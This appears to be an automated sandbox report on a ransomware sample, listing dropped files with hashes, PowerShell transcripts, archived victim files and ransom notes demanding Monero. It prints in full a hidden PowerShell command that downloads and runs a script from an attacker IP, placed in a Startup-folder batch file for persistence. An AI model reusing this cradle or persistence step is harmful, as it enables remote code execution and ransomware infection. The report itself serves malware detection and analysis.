                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):134
                                                                                                          Entropy (8bit):4.890433730651066
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:VSJJLNyLqPA6j/WCRV4qvtmAcLhzAK5Dm9pakXUIBfP97F:snyLmDeCHn8zD5CnXUIx97F
                                                                                                          MD5:77B87E33D61801FDAC6B78340A2C14C2
                                                                                                          SHA1:96A4E8E0804201653D7D3304AEED9EED64DABD1F
                                                                                                          SHA-256:BB3DBEE86B2F89BA03F9A46327BA3792775D1D008F29A5F70D4CA445BB9EC633
                                                                                                          SHA-512:2D40FC4E6EDCA6255426954D42CB360D4A88CCD936028920645FDC09A95AE429758D8732027919E3DF0BAA3B9042258B336220AF71BE25235C6120BBFDFF1815
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.855279000187437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:oQu3ZHmZm8AYZzfegExQocMyLum55Lrt5yn1gTgtUEpJoWa5x0:a3Z0eYZbvWUiIWneE6EHRaL0
                                                                                                          MD5:2C96AD92CD9E3A3A32F80E6270A946CC
                                                                                                          SHA1:75D5BBF95F4192C1B338CF8A0AA34103CD0FE92E
                                                                                                          SHA-256:D07003E3341C499831DC46F79FBD10E315C2F5B2EB0C0CCE180C39461AF40E59
                                                                                                          SHA-512:E809D0261E2B1958190AAC0C0C76D0F7A801AA9C3C080AFD7DF8554F611C9CC5C91F191924A39B3D0E9210CE29FFF9409A483B72AAFDE1B9B0D0A895DA397967
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!.......!..........~.c.Af;'..f...#5.".r.h.D"bP...4Gx.....2i'..S.F..k............"g.........`.......7.hd.j...,}.V..7_....7._..Y#J..Bb...:.w_.=.w?8..E.5.q.......V..s....H....O.I|.U....%"?.#.O....*...m.....zS..~s ...F......&&....N.W..R..H........._..*F...#..w..o'S...CD}..5.....Ksv...".cU f.._.?I.....#..W..qmBQ3C.w..OX...i.v../..9JYS.0..f&.....@...D.7.]Z..fF..f6B!......A..J.Y.)..s;{..~W...wOn..g...?._.....a..^$0....^V....ZJ......?...t.7u.S...E..T.L.%t.........7..M....9...........X..AW.:.a.*Iz.....p..E5.Z<.c.W9u5.N..6._J.d.U......^..\M....~.]R.H....%{.........q..~".N.s.pe.Ti........m...W.A.?.i}Lj@..(...Y....C...D.e.....QBs..r.|.U......6..X.;'.......?.,..8x..{..V.,......d1U.......e..Zk......W.iF`.s.U..1..^..xf.)..\.`..e.iz.!...aJKQ....*....<q)RQ.k...^..fO..u.=...E|>.|.....#1.@{.1.fe...@....%..F..h..M....4D..2.:Y.B*.D]S.J....H...zh.x...-..q..{(.'.=....._.l...x@ww..]....A8ybv.L.Z.\0..Tw..`O.S.K..7...1.F.P....U..w..~._.W.A.fm..o>....

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\JNNFORSOKJMFSS2JFZWXAMY=.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.851779088253073
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:z3Q5WHZ2QXjC0S8pVWFxjEOAF0W6BOfcySWFVcAom/dtMsjQTHslsMWs:rQ5XQX4GVWD0e4faWF/MsOMl7
                                                                                                          MD5:3C097476523E9045846A91691455D845
                                                                                                          SHA1:8B10AC8889B005AB25CFDF381A1CF16D729E3BA1
                                                                                                          SHA-256:5C4A320B5A23AC25386E34E696F4EBD27EFCCF5794DB05C449E66CB2C1569C9B
                                                                                                          SHA-512:931709C58B59A4357D7501BA3B364BEFEF3EC004B35A9C547D3FAFBDCDF9E0406675EA4EB98C1C4DABCB0C4AB369795AF81C100FAEC3F09876B3A15F66A763BA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!......`v!.......,+.%M7..E.J..k...]....".P<...o..~.U..o@........C...z|[.E..@.q.U...\.6..~.n..}..i.(..;..M.(..]:.-.J.9s.P.....'..H.%..!........:w9.O...R..c.S*C._.P...S_\.[iK4i..RM.(.m:.J9./k.@)......T.....OX.4N.......;..e5F.h...Iu.u../%.'....x[.h.............G...oH<.0..."`.B.I...6....`.,..d.....c5;..s...+Z..R4.,.uap..D.%..>...~..7.V....%..p._E#..26..~7..... e..mn....g.:-j^.n..P..f:...m....o.4.j|.8......$n..2l...i?.#....._.Jw.b..[6.O3:A..+O..W.o.%...L..~^...5..`....8.~...,.R.<..m.../%.w..||.....#.#-;b.7.nDd[.(o.9....#. ...;?...<.-3....|.... N.tU.9..A.e.%!X.|..g\I.2^.h..@Pi..N9.P)...0..3..Xu..Zj$.....aU.|...w!.].*..uV.. ..d....kIqXvG.~..tOt|..i.....<yE......../.$..?.dt..B..I.,....".i%.....=O...3....c.7.#Y...W......<.D..{..8k...M. .,....!..KX....bfy.a.e ....x.N.=..N5..b.h..R.....AF.........q.[..V..8,.....C.s.7;V4wC.O....F.A..G.A..?.B.R+....Do-..q..REe.../r..wY..=v.'@,...../.16..b.....d.i.....h...[GG...'...|..N.h.M].7...J.~U...V

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\JRKEWTKZIJJUKWK2FZ4GY43Y.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.848481626483717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:XWUVUxWL0Lunzh9CNzRPJUDN7PPVnyMBiWWQi7LBAM+p4hFI:X5rQuN9QmLnFuQG1A/b
                                                                                                          MD5:35557961F1D39E786E78844F87594C4A
                                                                                                          SHA1:C404BF69E778F07B05784345DAC27B2B29AAEAFA
                                                                                                          SHA-256:C70ECE1A1D585B82B8F4BB2EE48987C7E50454401AE53742A7FB4DC28E9A34BE
                                                                                                          SHA-512:1BB5DBAEE39B409D5EBFD3D97CEBC347DD5E11599FEBECF713EBEA414B3346622454D475356E848E94126C5DB35A3742F1698BB53DB51840D3E416D5215E524C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!.....@.c!.....qC+.X.yL.G.P...._....F.*.".....9..Z.-.......j........l.........ooY.Yf<o.("...u$...!Z.v...V......+.#..6#.Bu..v....R._....b.i....C8...CP.MC>.J...._t.M..B.$.;..u.4....4YcN..E...E.Wc.~....'.u..%...z..+|-...........R..|.e...|p..C$`%#...g........`Dycyhr.x#...D.w....p....5..|..I.d=r.X<.t...........p.@. .k..MX.../..r.Oa..m5M.Mu...0OJ...t.|.(,.u...Y....2..4.R3..Q..MN.....H.:....o.5..y'..#.g..}.....F.c.I0....4.x....1..:82..R..'...fx.)pWQ..C.......h...nc.z.,32....i0.W.i....;..#.c....7i.C..c.d{..n.k%..t].m...`..b91..zp3.. ....=.l...^)y'-?..E...O.AU.."$.....x....Lf..B.zs.O......4H..oyG..=Hw........gm2...R0..a....>...w......&..@WW..\...,<.[.>.....sw.`.t'U.......T...}..|.nb...J..x.u.>d...I....f...XvS...U..*..........hT....r...q:....!4g&.5......Obt.n.G{c.Q.1.....=i.9.L.y.."E-8.z.U4.:.4...#@...D...X.*|..Q..L.X.;X..p.IP...IGU.%.d..\r.,.FV.....8)..Og...Z..9C..$.......].t=.W.i.V.$..^.t..P.+..U... @...E.gHr...n...n7......n2...I....

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\JZLVIVSDIRKU2T2CFZYGIZQ=.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.834820072101623
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:E2GnJcMLxN2xrWP5NCN3HaLgyVTNZndCgmXdA+HIjXEJyWqoW950RP3wN:f/YNyrWRE3aLgSTN9stXq+HQEqo5fq
                                                                                                          MD5:B25DE2EEB79EB1B1F53BF7703A928AA6
                                                                                                          SHA1:643A053AD8B6915D1E419C5BDF18798A3F842F4C
                                                                                                          SHA-256:7305567D2F27869BBC516780806952C9545CC1D3EA27E32AB0A578A01D66F140
                                                                                                          SHA-512:7F94F3E6408FC67676BD747782C1F22A861E460308643FA994D3333E38BF5FF6945A4B80721969F3E3CFDC4F6EB4963AEEEA9830C37326454C235361C6E39915
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!.......!......X...<......+.yj.+....._..... UT.w<..1?$....e_u3..Q....L.z... ..lZ;...._...+I.\..5.....d..4"@...m.=g...G....+..-((`.dY[.f.{bWH.m..(W.=...)8^l......n...^e..Q...k.....M..|...E.p..A}d-..e.m{...^.+..&..&..V.>..Sn...n.E{...}<.TWm(8..'s&.A..4qOz.u..@71...`?-.....K.Pc7|..pI.y>^....../.^.B.q...M.....x'l...y...k..~|.8.c.......c-.3...%<..w0.j.^......l....L.D}f....FR........j.x.(*....6...,.Hp.c.....g...yb.0.........{....D>D.K....&..-DlfAz..v...@%].jF...<...A..m..8..X.J.............?.@B..GB.\..X.S.`..Iu...&}.H....B.Y1...?...$..j.......s....-...}..>.m.%t...{.rA......lk.Y.|....p..+...a...%..$.E[.E.L...?2.....z.....Q.,g.Zs..U.........=.L.F.Y......4).X....bsU.?,.q...6....u....../F....[~.%...5./.....~..~?.:..-.9..rc.....f.B..\........#...tV7O..fC...k.1?...>...=.5.R...`.....?.}.lj...aa....|.P.z......i....YKU....2.cL...#(..EO.o..`-?.}.7....V..-.^m.n.\.m...E..6 r.....G.{_7<.....rTe..$.....h.^..u.f. v@...."q.{.x.v..+U>.8.P.

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\K5KVISSTINBEGRSYFZVHAZY=.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.840872181651686
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Fdl4jaxnN8gy+yWSouBLwrSNaJR2F4zo9ACALnNJ8g+Uq/j:FdRLVyWSBtIGaJR+4k9ACAZGggb
                                                                                                          MD5:F2666F2CCB2A77BA730F7EEE7463910F
                                                                                                          SHA1:B6D83C8893EF0360F7EB656DC6033FC1545FD199
                                                                                                          SHA-256:380E092110194385BAA676F30BD4A6C2F637F4BAAB64B5FD41FD5CC5A0FA113D
                                                                                                          SHA-512:102CA5C4384EBC988EE3606B94CFDC7D2ACC65EFE2755CF8AFC0AB3C2C15BFB807D5560F92058F8764A8A77F6FB19BF0F36D422A5C72568230D12DD8104F481C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!......2?!.......4..`....I.C...,S....5?.jB........gM.d.pn.i7Rd.i@D.e.Mn;.w.m.....?....G..?se..2..4/<...3..j^.;.?4...d^.......yk..g!.m..(...I......(2~...$...(.....d..8...VR..........4..&:..4.w!......l..(...j*t.j....M(.Y. ..h.j..c.j.P.......w.H.....fo.../...v...l..k..`.L..]Z..j"".iz........n.....^&.>..*..9......<.f..Oj...........*..S^.....QB....s..........z.'.^.iM...y....,#]..)....u.@.5.l85...s.a.^...i.mw.gh........<m9......8."f.SJ.B+J....~e.w..XU..Fj.-....'!.EZ..:..?Z.....N&..=....3.}g3X3.3b/)..m+0...>i}..E.F0t" .i....Y.|..1./N...V....W.qs..).... .r..9..............\r...?.{..BU.]n.#.,..z.e;.........c......v..b.j`J.`...z8...L..?..>Q#p.4..N.....@..C3).u..,PX`..s.U.<~..'r.;J.&m.uvz.Q.w...].....~PT>.~.Y..A8z..>hg...T.C#./....C.......bb..U.J)5"..fW.1.|. n}.....=:.?..<.......f.g.J.w.MWH3'.0?.d...2..u.6.G.A._...6......L[P......9%C......K5.`...8.n.SSb$......F..v.2?....Z....*..8...`b.......ut..X.l@..".......y.[.d.^..P].q....BI...Wpj.s.SlE..1S.."..K.Mv.

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\LFIFGSKBINEFSWCXFZYG4ZY=.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.843063384536695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:KYVaWb9vbucHO5aIp+NHUWjLoPVEQKypvUa6vrzaJr5YVV4UtLZfXk:KQJHFU4LoPzp8a6vCJrmVV40LFU
                                                                                                          MD5:FBD3E0875DC6A2D83ED40A096B698A9B
                                                                                                          SHA1:A78DC351F0AEF779B36ABDAB39090E82A6FD3DFC
                                                                                                          SHA-256:B6952D84AB795D73C3B25C4B512E7C0E46BEDBB76926F19B1BC5E6DA9508D5A1
                                                                                                          SHA-512:54FC51E12EE41769DFF01B39244804B09D4294EAE8D5CFCD879C1A56FC12AE649D76CA8E7B0DE51972B0A39FA240DED51F611996D947A8D4F8FB9BE7251C1965
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!........!......O.}...B.0....?a...?|.}...."0.X.q...G*.Q1..<'_...g.......z.,.j...........5.S...{).c...M(.......BF.4u..At..b....'.v....Q...2Y[..+.....+..`Z....&].}*.....NP.....5....~.....q..L..L.dX|f..:QF.>.#.{......yz..r2}....v.....S..#.?.4.q@........s.J.y9...-...k.;1P....n@....~...,........R..Cuh.w.j.8w...P....c!.`'.Bq.h:\92oK...._..E.D>......g...#.._..... .S..gdtLy.."Cm..F.n.N....v....-Abe....E.:6.....q.G..is>.].B.1..Q.n.{h....T.Y...X.......-....h ..j.....[..]...X...w.kD;...=f;gz..>...........z.me..JF...3..V.....C '}u..ur.B....&X......hS.`x..d8.|~.....^.C.g.X.T...r[v..R8.Q.KE4ro.I8..ga............X..<......6..c.E........._........O.%d...{.......$.F.h.u.L. ....i.W.5.J..[...R<...V...G.]...Y"..k>....G......&..1...c..L...).v]r...F.~....SV..........N..kC....i<3.*..J...`. .@..hb...AT..<.x=|HP`Y.b.:..hL.bL..5...$..v./p....Pea..........^.t.P?...".Q2..<...>.d..-4j.].j.E.K.J...Y..+Ij.=E5.e..;Z4:...\....g..Q.Di_@.a..V.V..5./....~.>.....C1..{.

                                                                                                          C:\Users\user\Desktop\DVWHKMNFNN\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Users\user\Desktop\IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\rar.exe
                                                                                                          File Type:RAR archive data, v5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278
                                                                                                          Entropy (8bit):7.853891134208106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:OBW+El8KpNGnXuSUlMJ//q7bDPFg/scDePDQ2qJqE8M8aLCGMaHt:OBWYKC+SU4/C7bD9g00e7Q2qHWTcHt
                                                                                                          MD5:2273DB5076F33CD98B4433DF27A2443D
                                                                                                          SHA1:417C1F737B4E81E78858C29F6BABD52061EBA1E3
                                                                                                          SHA-256:568390920FF473B309A4379A3BA5F79168DAB1EC4A48225DB88714BC420F0627
                                                                                                          SHA-512:F9BF5837A701A1B1A398EF08756E6FADD72DEEF25AE71EE8A50CB59D6C56A7A8BA6E65AED9FE6C0FE96484E464C5D43FCF9CCEB8468869A86DB815F8DE8655FD
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Rar!.......t!.....~2<K..!..gNs%....)s......ecW..q...x...?.4)|.x............R(Y.......,.../....:.1Z....2v..@.C`[S-....[...Ax.Qo.7t..l...*.{....V......e..3[n....hcc,..r)v:..TW..O.e..........y.D.TMbF..."t....H9]....u..".g.x.O....`.i..R:)w..^.Y...y<;.+.O.g.4...p..x0..#...[.]-.m=..<...y..})..7.e=...9.L.....y.u..........>H.......W..a....i."../...u...SP.31.........C...Q.p... .Y.~...d..-...cr...0za.....F...J..T..`OQ/.... ...n.s$.\. .t.......T1!....{..q.eTcd1.0.m...E,.5G......}7...r1n..L.\..a....f*.:.w.'P....0.R...5.(..a.q.X..V.d.^...k.+k.Gw...0.;..?S.h...'-...$..$..m..pHA.;.T]...l.....^....V....D.^....|.....z...O..x....~...:.3..~X...h\.....V..}...9..Q...s.#........O.%.g*>..A.#F..S..............@.....;|b.....{.~.N..X....F.....D...w.%.R.....B.X.Jbv.....'..J..:.@.!..o.J.3......`...'V.s..a.....Zs9Q..fb..V..4.7..p...!.tM(u....q.....y.D..E..Y}K.S....H.7GkqTc.e.y.....{.[5.e...m..x.o...^....0....p.<M...{...|.....jF...Jc7^..h...d.+f_.k.J.!....{W....P]B.3.

                                                                                                          C:\Users\user\Desktop\LTKMYBSEYZ\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Users\user\Desktop\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Users\user\Documents\20220813\KBXXOZLSKNUGK3DML52HEYLOONRXE2LQOQXDCNZZGYYDKLRXKF3UMNBTOFPS4MRQGIZDAOBRGMYDSMBWGU3C45DYOQ====== (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1071
                                                                                                          Entropy (8bit):5.160709619789369
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:BxSAidZOvBdauzx2DOXizydx5W4HjeTKKjX4CIym1ZJXsqdx5nxSAZMq:BZRv6eoO1xI4qDYB1ZhxdZZj
                                                                                                          MD5:D8E09F67FD18FD734128E78EBC57DB24
                                                                                                          SHA1:2DDE057E2DBB16A1EF98DE9DFE3E2ADA69AB6259
                                                                                                          SHA-256:8E70F68AF8A226E5F48666AE2EF098BA6AC80A087FD50BB447E557B6008F2839
                                                                                                          SHA-512:E38B7FC65BED580CB3929ADBA0EB7AABA0D43244C2CA65E7325CEEF79D33379C8CAA572379C3D58666E2BE2A69AC0BEEC2C951B7634BAD51948A4FD36C0A7A3F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220813090700..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString("http://212.87.212.218/doanlowd.txt")..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220813090700..**********************..PS>iex(New-Object Net.WebClient).DownloadString("http://212.87.212.218/doanlowd.txt")..**********************..Command start time: 20220813091034..**********************..PS>$global:?..True..**********************..Windows PowerS

                                                                                                          C:\Users\user\Documents\20220813\KBXXOZLSKNUGK3DML52HEYLOONRXE2LQOQXDCNZZGYYDKLSQKRUHG6CGIRGS4MRQGIZDAOBRGMYDSMBWGU2S45DYOQ====== (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1144
                                                                                                          Entropy (8bit):5.165278765104744
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:BxSAbhdZOvBdauzx2DOXizyczxmW4HjeTKKjX4CIym1ZJXzDqczxoUklWv8nxSAj:BZb0v6eoOYxh4qDYB1ZllxorMv6ZZl
                                                                                                          MD5:036BF0D027A20D62E7DD868313B98553
                                                                                                          SHA1:211AAA403B6C38D4ED8F928AB10F2491DFEC5C7A
                                                                                                          SHA-256:A120B5E5301A0C547C0DDFAD8D07EC9D0AA580BA059AA6067806313406F54051
                                                                                                          SHA-512:72996FAD432B8A09D387371220CEEA3AAB1022378A293F35D28855FD5B6C80C6470B6B2B68A70F35BBAD70453AE91AFF7405A36132AF1CDA84CB1B0FF58A8DDF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220813090657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')..Process ID: 4440..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220813090657..**********************..PS>iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')..File does not exist, download again..Process not started, start process..**********************..Command start time: 20220813091121..*********

                                                                                                          C:\Users\user\Documents\20220813\PowerShell_transcript.179605.7QwF43q_.20220813090656.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1071
                                                                                                          Entropy (8bit):5.160709619789369
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:BxSAidZOvBdauzx2DOXizydx5W4HjeTKKjX4CIym1ZJXsqdx5nxSAZMq:BZRv6eoO1xI4qDYB1ZhxdZZj
                                                                                                          MD5:D8E09F67FD18FD734128E78EBC57DB24
                                                                                                          SHA1:2DDE057E2DBB16A1EF98DE9DFE3E2ADA69AB6259
                                                                                                          SHA-256:8E70F68AF8A226E5F48666AE2EF098BA6AC80A087FD50BB447E557B6008F2839
                                                                                                          SHA-512:E38B7FC65BED580CB3929ADBA0EB7AABA0D43244C2CA65E7325CEEF79D33379C8CAA572379C3D58666E2BE2A69AC0BEEC2C951B7634BAD51948A4FD36C0A7A3F
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.7QwF43q_.20220813090656.txt, Author: Florian Roth
                                                                                                          Reputation:unknown
                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220813090700..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString("http://212.87.212.218/doanlowd.txt")..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220813090700..**********************..PS>iex(New-Object Net.WebClient).DownloadString("http://212.87.212.218/doanlowd.txt")..**********************..Command start time: 20220813091034..**********************..PS>$global:?..True..**********************..Windows PowerS

                                                                                                          C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1144
                                                                                                          Entropy (8bit):5.165278765104744
                                                                                                          Encrypted:false
